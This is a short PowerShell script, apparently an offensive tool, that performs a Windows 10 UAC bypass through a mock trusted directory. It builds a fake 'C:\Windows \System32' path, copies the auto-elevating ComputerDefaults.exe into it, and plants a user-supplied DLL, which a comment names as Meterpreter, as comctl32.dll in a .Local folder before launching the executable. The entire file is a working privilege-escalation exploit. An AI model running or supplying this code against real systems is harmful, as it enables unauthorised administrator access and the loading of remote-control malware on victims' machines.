function invoke-mockingtrusteddirectory{
  param(
            [Parameter(Mandatory)]
            [string] $dll,
            [Paramenter]
            [string] $base
        )

if(-not $base)
{
  $base = "amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.407_none_fb449d63306391e9"
}

if((Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" ).ProductName -like '*Windows 10*')
{
  [System.io.directory]::CreateDirectory("\\?\\C:\\Windows \\")
  [System.io.directory]::CreateDirectory("C:\\Windows \\System32")
  [System.io.file]::Copy("C:\Windows\System32\ComputerDefaults.exe","C:\Windows \System32\ComputerDefaults.exe")
  [System.io.directory]::CreateDirectory("C:\\Windows \\System32\\ComputerDefaults.exe.Local")
  [System.io.directory]::CreateDirectory("C:\\Windows \\System32\\ComputerDefaults.exe.Local\\$base")
  [System.io.file]::Copy($dll,"C:\\Windows \\System32\\ComputerDefaults.exe.Local\\$base\comctl32.dll")
  #Move DLL x64 (Meterpreter)
  Start-Process "C:\Windows \System32\ComputerDefaults.exe" 
}

}
